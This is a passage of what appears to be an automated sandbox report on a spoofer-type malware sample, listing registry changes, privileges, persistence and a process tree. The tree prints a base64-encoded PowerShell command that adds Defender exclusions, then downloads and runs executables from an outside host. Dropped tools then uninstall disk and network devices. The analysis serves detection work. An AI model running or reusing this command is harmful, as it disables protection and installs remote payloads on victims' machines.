DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C DevManView.exe -
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 932 schtasks.exe 4124 schtasks.exe 3516 schtasks.exe 812 schtasks.exe 1612 schtasks.exe 5088 schtasks.exe 752 schtasks.exe 3112 schtasks.exe 3648 schtasks.exe 2580 schtasks.exe 3992 schtasks.exe 1236 schtasks.exe 1972 schtasks.exe 4976 schtasks.exe 2680 schtasks.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Modifies registry class 2 IoCs
Processes:
sphyperRuntimedhcpSvc.exesphyperRuntimedhcpSvc.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings sphyperRuntimedhcpSvc.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings sphyperRuntimedhcpSvc.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
HyperSpoof.exepowershell.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exesphyperRuntimedhcpSvc.exepid Process 1572 HyperSpoof.exe 1572 HyperSpoof.exe 1572 HyperSpoof.exe 1572 HyperSpoof.exe 1572 HyperSpoof.exe 1572 HyperSpoof.exe 4708 powershell.exe 4708 powershell.exe 4424 DevManView.exe 2444 DevManView.exe 2444 DevManView.exe 4424 DevManView.exe 1912 DevManView.exe 1276 DevManView.exe 1276 DevManView.exe 1912 DevManView.exe 1156 DevManView.exe 1156 DevManView.exe 3084 DevManView.exe 3084 DevManView.exe 3424 DevManView.exe 3424 DevManView.exe 3732 DevManView.exe 3732 DevManView.exe 3140 DevManView.exe 3140 DevManView.exe 1976 DevManView.exe 1976 DevManView.exe 1540 DevManView.exe 1540 DevManView.exe 2760 DevManView.exe 2760 DevManView.exe 1340 DevManView.exe 1340 DevManView.exe 4984 DevManView.exe 4984 DevManView.exe 4984 DevManView.exe 2824 DevManView.exe 2824 DevManView.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe 3556 sphyperRuntimedhcpSvc.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
HpsrSpoof.execonhost.exepid Process 1324 HpsrSpoof.exe 4524 conhost.exe -
Suspicious behavior: LoadsDriver 24 IoCs
Processes:
pid Process 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
HyperSpoof.exepowershell.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription pid Process Token: SeDebugPrivilege 1572 HyperSpoof.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeBackupPrivilege 2444 DevManView.exe Token: SeRestorePrivilege 2444 DevManView.exe Token: SeTakeOwnershipPrivilege 2444 DevManView.exe Token: SeBackupPrivilege 4424 DevManView.exe Token: SeRestorePrivilege 4424 DevManView.exe Token: SeTakeOwnershipPrivilege 4424 DevManView.exe Token: SeBackupPrivilege 1912 DevManView.exe Token: SeRestorePrivilege 1912 DevManView.exe Token: SeTakeOwnershipPrivilege 1912 DevManView.exe Token: SeBackupPrivilege 1276 DevManView.exe Token: SeRestorePrivilege 1276 DevManView.exe Token: SeTakeOwnershipPrivilege 1276 DevManView.exe Token: SeImpersonatePrivilege 2444 DevManView.exe Token: SeImpersonatePrivilege 1276 DevManView.exe Token: SeImpersonatePrivilege 1912 DevManView.exe Token: SeImpersonatePrivilege 4424 DevManView.exe Token: SeBackupPrivilege 1156 DevManView.exe Token: SeRestorePrivilege 1156 DevManView.exe Token: SeTakeOwnershipPrivilege 1156 DevManView.exe Token: SeImpersonatePrivilege 1156 DevManView.exe Token: SeBackupPrivilege 3084 DevManView.exe Token: SeRestorePrivilege 3084 DevManView.exe Token: SeTakeOwnershipPrivilege 3084 DevManView.exe Token: SeImpersonatePrivilege 3084 DevManView.exe Token: SeBackupPrivilege 3424 DevManView.exe Token: SeRestorePrivilege 3424 DevManView.exe Token: SeTakeOwnershipPrivilege 3424 DevManView.exe Token: SeImpersonatePrivilege 3424 DevManView.exe Token: SeBackupPrivilege 3732 DevManView.exe Token: SeRestorePrivilege 3732 DevManView.exe Token: SeTakeOwnershipPrivilege 3732 DevManView.exe Token: SeImpersonatePrivilege 3732 DevManView.exe Token: SeBackupPrivilege 3140 DevManView.exe Token: SeRestorePrivilege 3140 DevManView.exe Token: SeTakeOwnershipPrivilege 3140 DevManView.exe Token: SeBackupPrivilege 1976 DevManView.exe Token: SeRestorePrivilege 1976 DevManView.exe Token: SeTakeOwnershipPrivilege 1976 DevManView.exe Token: SeBackupPrivilege 1540 DevManView.exe Token: SeRestorePrivilege 1540 DevManView.exe Token: SeTakeOwnershipPrivilege 1540 DevManView.exe Token: SeImpersonatePrivilege 3140 DevManView.exe Token: SeImpersonatePrivilege 1976 DevManView.exe Token: SeImpersonatePrivilege 1540 DevManView.exe Token: SeBackupPrivilege 1340 DevManView.exe Token: SeRestorePrivilege 1340 DevManView.exe Token: SeTakeOwnershipPrivilege 1340 DevManView.exe Token: SeBackupPrivilege 2760 DevManView.exe Token: SeRestorePrivilege 2760 DevManView.exe Token: SeTakeOwnershipPrivilege 2760 DevManView.exe Token: SeImpersonatePrivilege 1340 DevManView.exe Token: SeBackupPrivilege 4984 DevManView.exe Token: SeRestorePrivilege 4984 DevManView.exe Token: SeTakeOwnershipPrivilege 4984 DevManView.exe Token: SeImpersonatePrivilege 2760 DevManView.exe Token: SeImpersonatePrivilege 4984 DevManView.exe Token: SeBackupPrivilege 2824 DevManView.exe Token: SeRestorePrivilege 2824 DevManView.exe Token: SeTakeOwnershipPrivilege 2824 DevManView.exe Token: SeLoadDriverPrivilege 2760 DevManView.exe Token: SeImpersonatePrivilege 2824 DevManView.exe Token: SeLoadDriverPrivilege 4984 DevManView.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
HyperSpoof.exepowershell.exeHpsrSpoof.exesphyperRuntimedhcpSvc.execmd.execmd.exeWScript.execmd.execonhostsft.execmd.execmd.exedescription pid Process procid_target PID 1572 wrote to memory of 4708 1572 HyperSpoof.exe 80 PID 1572 wrote to memory of 4708 1572 HyperSpoof.exe 80 PID 4708 wrote to memory of 1324 4708 powershell.exe 85 PID 4708 wrote to memory of 1324 4708 powershell.exe 85 PID 4708 wrote to memory of 2632 4708 powershell.exe 87 PID 4708 wrote to memory of 2632 4708 powershell.exe 87 PID 4708 wrote to memory of 2632 4708 powershell.exe 87 PID 4708 wrote to memory of 1672 4708 powershell.exe 88 PID 4708 wrote to memory of 1672 4708 powershell.exe 88 PID 4708 wrote to memory of 1672 4708 powershell.exe 88 PID 1324 wrote to memory of 3396 1324 HpsrSpoof.exe 89 PID 1324 wrote to memory of 3396 1324 HpsrSpoof.exe 89 PID 2632 wrote to memory of 2688 2632 sphyperRuntimedhcpSvc.exe 91 PID 2632 wrote to memory of 2688 2632 sphyperRuntimedhcpSvc.exe 91 PID 2632 wrote to memory of 2688 2632 sphyperRuntimedhcpSvc.exe 91 PID 3396 wrote to memory of 3456 3396 cmd.exe 92 PID 3396 wrote to memory of 3456 3396 cmd.exe 92 PID 1324 wrote to memory of 1272 1324 HpsrSpoof.exe 94 PID 1324 wrote to memory of 1272 1324 HpsrSpoof.exe 94 PID 1272 wrote to memory of 2444 1272 cmd.exe 96 PID 1272 wrote to memory of 2444 1272 cmd.exe 96 PID 1272 wrote to memory of 4424 1272 cmd.exe 97 PID 1272 wrote to memory of 4424 1272 cmd.exe 97 PID 1272 wrote to memory of 1276 1272 cmd.exe 98 PID 1272 wrote to memory of 1276 1272 cmd.exe 98 PID 1272 wrote to memory of 1912 1272 cmd.exe 99 PID 1272 wrote to memory of 1912 1272 cmd.exe 99 PID 1272 wrote to memory of 1156 1272 cmd.exe 100 PID 1272 wrote to memory of 1156 1272 cmd.exe 100 PID 1272 wrote to memory of 3084 1272 cmd.exe 101 PID 1272 wrote to memory of 3084 1272 cmd.exe 101 PID 1272 wrote to memory of 3424 1272 cmd.exe 102 PID 1272 wrote to memory of 3424 1272 cmd.exe 102 PID 1272 wrote to memory of 3732 1272 cmd.exe 103 PID 1272 wrote to memory of 3732 1272 cmd.exe 103 PID 1272 wrote to memory of 3140 1272 cmd.exe 234 PID 1272 wrote to memory of 3140 1272 cmd.exe 234 PID 1272 wrote to memory of 1976 1272 cmd.exe 105 PID 1272 wrote to memory of 1976 1272 cmd.exe 105 PID 1272 wrote to memory of 1540 1272 cmd.exe 106 PID 1272 wrote to memory of 1540 1272 cmd.exe 106 PID 1272 wrote to memory of 1340 1272 cmd.exe 107 PID 1272 wrote to memory of 1340 1272 cmd.exe 107 PID 1272 wrote to memory of 2760 1272 cmd.exe 108 PID 1272 wrote to memory of 2760 1272 cmd.exe 108 PID 1272 wrote to memory of 4984 1272 cmd.exe 218 PID 1272 wrote to memory of 4984 1272 cmd.exe 218 PID 1272 wrote to memory of 2824 1272 cmd.exe 110 PID 1272 wrote to memory of 2824 1272 cmd.exe 110 PID 2688 wrote to memory of 3256 2688 WScript.exe 283 PID 2688 wrote to memory of 3256 2688 WScript.exe 283 PID 2688 wrote to memory of 3256 2688 WScript.exe 283 PID 3256 wrote to memory of 3556 3256 cmd.exe 113 PID 3256 wrote to memory of 3556 3256 cmd.exe 113 PID 1672 wrote to memory of 1908 1672 conhostsft.exe 93 PID 1672 wrote to memory of 1908 1672 conhostsft.exe 93 PID 1324 wrote to memory of 4676 1324 HpsrSpoof.exe 160 PID 1324 wrote to memory of 4676 1324 HpsrSpoof.exe 160 PID 4676 wrote to memory of 3652 4676 cmd.exe 117 PID 4676 wrote to memory of 3652 4676 cmd.exe 117 PID 1324 wrote to memory of 1968 1324 HpsrSpoof.exe 121 PID 1324 wrote to memory of 1968 1324 HpsrSpoof.exe 121 PID 1968 wrote to memory of 1984 1968 cmd.exe 309 PID 1968 wrote to memory of 1984 1968 cmd.exe 309 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: L59I-K5JS4⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe c: L59I-K5JS5⤵
- Executes dropped EXE
PID:3456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat4⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
